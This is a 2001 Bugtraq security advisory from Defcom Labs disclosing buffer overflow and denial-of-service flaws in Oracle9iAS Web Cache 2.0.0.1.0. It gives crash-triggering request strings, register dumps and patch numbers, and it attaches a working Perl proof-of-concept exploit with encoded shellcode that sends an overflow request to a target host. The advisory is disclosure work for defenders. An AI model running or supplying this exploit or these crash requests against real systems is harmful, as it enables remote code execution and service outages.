[22893] in bugtraq
def-2001-30
daemon@ATHENA.MIT.EDU (andreas junestam)
Thu Oct 18 12:38:46 2001
Message-ID: <3BCEE434.F597D815@defcom.com>
Date: Thu, 18 Oct 2001 16:16:20 +0200
From: andreas junestam <andreas.junestam@defcom.com>
MIME-Version: 1.0
To: bugtraq <bugtraq@securityfocus.com>
Content-Type: multipart/mixed;
boundary="------------5863BC04E0D930CADAEED685"
--------------5863BC04E0D930CADAEED685
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
======================================================================
Defcom Labs Advisory def-2001-30
Oracle9iAS Web Cache/2.0.0.1.0 Multiple DoS and Buffer Overflow
Authors: George Hedfors <george.hedfors@defcom.com>
Andreas Junestam <andreas.junestam@defcom.com>
Release Date: 2001-10-18
======================================================================
------------------------=[Brief Description]=-------------------------
Release 2.0.0.1.0 and perhaps even previous releases, contain a URL
driven buffer overrun condition which either can cause process exiting,
process hanging or injection of malicious code.
------------------------=[Affected Systems]=--------------------------
Oracle9iAS Web Cache/2.0.0.1.0 on all supported platforms.
----------------------=[Detailed Description]=------------------------
A simple URL driven denial of service or buffer overflow condition
occurs when a very long text string is sent to the web service.
This occurs on all four web services that the Oracle9iAS Web Cache
software provides. The four services are by default run on:
Port 1100 = Incoming web cache proxy.
Port 4000 = Administrative interface.
Port 4001 = Web XML invalidation port.
Port 4002 = Statistics port.
* Buffer overflow condition:
When sending a request containing / + 'A' x 3095 + 'N' x 4, the
process terminates with the with the following state dump:
<....snip>
State Dump for Thread Id 0x104
eax=00000c1d ebx=00000000 ecx=00000c1d edx=026f0041
esi=01baac86 edi=0040deb6
eip=4e4e4e4e esp=0632fe08 ebp=41414141 iopl=0
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00000216
<snip....>
* Denial of service:
Upon sending a string longer then 3570 characters, the process
simply exists without stack dump:
'GET /<3571 x A> HTTP/1.0'
The following three denial of service attacks result in the process
hanging and the CPU usage of 100% and a reboot is required in order
to terminate the hanging processes.
- When sending a string containing approximately 3094 characters.
- When sending more aproximatly 4000 characters in the HTTP header.
User-Agent is one of the verified headers where this condition
exists.
'GET / HTTP/1.0'
'User-Agent: <4000 x A>'
- Sending the following request (this only affects the webcache
admin interface):
'GET /. HTTP/1.0'
---------------------------=[Workaround]=-----------------------------
Download patch from Oracle's support website,
http://metalink.oracle.com
NT/WIN2K:
Patch number 2044682
SUN Sparc Solaris:
Patch number 2042106
HP-UX:
Patch number 2043908
Linux:
Patch number 2043924
Compaq Tru64 Unix:
Patch number 2043921
IBM AIX:
Patch number 2043917
-----------------------------=[Exploit]=------------------------------
For NT/WIN2K, see attached file, webcache.pl
-------------------------=[Vendor Response]=--------------------------
Vendor was notified on 2001-09-17. Patch is released.
======================================================================
This release was brought to you by Defcom Labs
labs@defcom.com labs.defcom.com
======================================================================
--------------5863BC04E0D930CADAEED685
Content-Type: application/x-perl;
name="webcache.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="webcache.pl"
#########################################################################
#
# Proof-of-concept exploit for Oracle9iAS Web Cache/2.0.0.1.0
# Creates the file c:\defcom.iyd
# By andreas@defcom.com (C)2001
#
#
# Since we do not control the space after what ESP points to, I was lazy
# and did a direct buffer jump. So, if it does not work, try changing
# the return address(start of buffer in mem) to one that fits your system.
# The buffer starts at 0x05c5f1e8 on my box(WIN2K prof SP2).
# /andreas
#
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
print "Usage: $0 <host>\n";
print "Example: $0 127.0.0.1\n";
exit;
}
use Socket;
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1100"; # default port for the web cache
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
$sploit = "\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xec\x8b\xc2\x83\xc0\x18\x33\xc9";
$sploit=$sploit . "\x66\xb9\xb3\x80\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa\xaa\x59";
$sploit=$sploit . "\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9\xf1\x99\x99\x99\x89\x1a\x5b\xa4";
$sploit=$sploit . "\xcb\x27\x51\x99\xd5\x99\x66\x8f\xaa\x59\xc9\x27\x09\x98\xd5\x99\x66";
$sploit=$sploit . "\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4\xb7\xf0\xe0\xfd\x99";
$msg = "GET " . $sploit . "\x90" x (3096 - length($sploit)) . "\xe8\xf1\xc5\x05" . " HTTP/1.0\n\n";
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
close(SOCK);
exit;
--------------5863BC04E0D930CADAEED685--
